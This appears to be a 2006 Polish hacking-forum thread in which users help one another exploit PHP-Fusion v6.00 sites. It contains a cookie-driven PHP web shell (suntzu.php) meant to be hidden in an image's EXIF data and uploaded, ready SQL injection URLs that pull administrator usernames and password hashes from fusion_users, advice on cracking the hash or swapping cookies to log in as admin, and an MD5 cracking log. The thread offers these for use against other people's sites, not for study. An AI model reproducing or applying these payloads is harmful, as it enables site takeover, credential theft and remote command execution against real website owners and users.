PHP-Fusion v6.00
- Thread starter Lama2006
- Rozpoczęty
To szukaj w internecie. www.milw0rm.com
przepraszam juz znalazlem mam te plik na serwie ale jak uzyc tych exploitow przypominam mam juz te pliki php na serwie w obsludze php
http://www.milw0rm.com/exploits/1796
i
http://www.milw0rm.com/exploits/1760
DZIEKUJE ZA ODPOWIEDZ
http://www.milw0rm.com/exploits/1796
i
http://www.milw0rm.com/exploits/1760
DZIEKUJE ZA ODPOWIEDZ
No ale proszę. Jakbym znał lepiej angielski to bym sam to zrobił. Próbowałem sam i nic nie wychodzi mi! Narazie tyle co zrozumiałem to że:
1.Biorę ten plik i zmieniam jego nazwę na:
suntzu.php.php[1].gif
2.Wstawiam do EXIF ten kod:
3. Potem wsadzam plik na serwer za pomocą formularza
4. I odpalam go.
Jednak mi to nie wychodzi. Gdzie robię błąd????
1.Biorę ten plik i zmieniam jego nazwę na:
suntzu.php.php[1].gif
2.Wstawiam do EXIF ten kod:
Kod:
<?php
$fp=fopen("suntzu.php","w");
fputs($fp,"<?php error_reporting(0);set_time_limit(0);if (get_magic_quotes_gpc()) {$_COOKIE[cmd]=stripslashes($_COOKIE[cmd]);}echo 56789;passthru($_COOKIE[cmd]);echo 56789;?>");
fclose($fp);
chmod("suntzu.php",777);
?>3. Potem wsadzam plik na serwer za pomocą formularza
4. I odpalam go.
Jednak mi to nie wychodzi. Gdzie robię błąd????
Master_H@ker
Użytkownik
- Dołączył
- Styczeń 26, 2006
- Posty
- 63
podaj stronke PHP FUSION ja ci pomoge
Witam.
Natrafilem niejako przypadkiem na ten temat i postanowilem przyjrzec mu sie blizej, przeciez trzeba sie doksztalcac ;p przejrzalem dosc pobieznie link podany przez Lama2006 link. Ku mojemu zaskoczeniu jakos nie moge go pojac, a raczej dojsc do tego jak go zastosowac w praktyce, pomimo tego iz w przeciwienstwie do poprzednikow znam angielski (o ile w ogole mozna powiedziec ze sie zna jakis jezyk ;p) i conajmniej podstawy php. KOd jest napisany jakby pod formularz, wystepuja tam zmienne $host $path itd ktorych wartosci nie ma gdzie zadeklarowac, przypisana jest im jedynie zmienna $argv ktora tez nie wiadomo skad sie wziela ;p Nie mam doswiadczenia w exploitach wiec prosilbm o wytlumaczenie mi zastosowania tego exploita ;p
Natrafilem niejako przypadkiem na ten temat i postanowilem przyjrzec mu sie blizej, przeciez trzeba sie doksztalcac ;p przejrzalem dosc pobieznie link podany przez Lama2006 link. Ku mojemu zaskoczeniu jakos nie moge go pojac, a raczej dojsc do tego jak go zastosowac w praktyce, pomimo tego iz w przeciwienstwie do poprzednikow znam angielski (o ile w ogole mozna powiedziec ze sie zna jakis jezyk ;p) i conajmniej podstawy php. KOd jest napisany jakby pod formularz, wystepuja tam zmienne $host $path itd ktorych wartosci nie ma gdzie zadeklarowac, przypisana jest im jedynie zmienna $argv ktora tez nie wiadomo skad sie wziela ;p Nie mam doswiadczenia w exploitach wiec prosilbm o wytlumaczenie mi zastosowania tego exploita ;p
Widocznie da radę wykorzystać srch_where by wstawić ("wstrzyknąć") pewien włąsny kod, a dokładniej zapytanie do bazy danych sql o loginy i hasła adminów (poziom 103 użytkownika), a potem zwrócić to uruchamiającemu skrypt.
Użycie jest proste, wystarczy przeczytać początek - albo odpalić bez żadnych opcji.
Trzeba być zarejestrowanym na atakowanym forum.
Użycie jest proste, wystarczy przeczytać początek - albo odpalić bez żadnych opcji.
Trzeba być zarejestrowanym na atakowanym forum.
a moze tak :
rejestrujemy sie na stronie .. logujemy ..
i doklejamy do adresu pewien kod np.
xxx.xxx.pl/messages.php?folder=inbox&show=_&srch_where=999999%20UNION%20SELECT%200,0,0,user_password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20fusion_users%20WHERE%20user_level=103/*
i mamy hash admina =]
potem wlazimy na np.
xxx.xxx.pl/messages.php?folder=inbox&show=_&srch_where=999999 UNION SELECT 0,0,0,user_name,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 FROM fusion_users WHERE user_level=103/*
i mamy nazwy adminow =]
potem tylko rozkodowanie hasha lub podmiana cookie i jestesmy ;>
rejestrujemy sie na stronie .. logujemy ..
i doklejamy do adresu pewien kod np.
xxx.xxx.pl/messages.php?folder=inbox&show=_&srch_where=999999%20UNION%20SELECT%200,0,0,user_password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20fusion_users%20WHERE%20user_level=103/*
i mamy hash admina =]
potem wlazimy na np.
xxx.xxx.pl/messages.php?folder=inbox&show=_&srch_where=999999 UNION SELECT 0,0,0,user_name,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 FROM fusion_users WHERE user_level=103/*
i mamy nazwy adminow =]
potem tylko rozkodowanie hasha lub podmiana cookie i jestesmy ;>
podolaczek
Użytkownik
- Dołączył
- Maj 10, 2006
- Posty
- 4
W jaki sposob podmienic te cookie? Mozecie to jakos opisac?
do podmiany cookies'ow polecam opere bo ma bardzo wygodnego mendżera ciastek... wszystko zalezy od przegladarki ktorej uzywasz, ale wystarczy znalezc folder w ktorym przechowuje Ci przegladarka cookies'y i znalezc tego od strony ktora atakujesz ...
podolaczek
Użytkownik
- Dołączył
- Maj 10, 2006
- Posty
- 4
To mozesz wytlumaczyc na bazie Opery?
D0han
Były Moderator
- Dołączył
- Lipiec 27, 2005
- Posty
- 975
Hmm, faktycznie. Widac cos przeoczylem, ale to nie zmienia faktu ze z lamaniem MD5 sa 'pewne' problemy:
Kod:
Rozpoczęto o : 12:25:13 - 24-06-2006
Hash : 212a4c389db4ecfacf61817a711cf892
Liczba serwisów : 7/7
-----------------------------
Serwis : passcracking.ru [~15.5 mln]
Status : Brak hasha w bazie, dodano do kolejki...
-------------
Serwis : md5.altervista.org [~5.1 mln]
Status : Nie udało się odkodować hasha :-(
-------------
Serwis : shm.hard-core.pl [~3.0 mln]
Status : Nie udało się odkodować hasha :-(
-------------
Serwis : securitystats.com [~10.0 tyś]
Status : Nie udało się odkodować hasha :-(
-------------
Serwis : passcrack.spb.ru [~7.9 mln]
-------------
Serwis : milw0rm.com [~10.0 tyś]
Status : Błąd komunikacji z serwisem !!!
-------------
Serwis : gdataonline.com [~73,6 mln]
Status :
-------------
Zakończono o : 12:25:57 - 24-06-2006
-----------------------------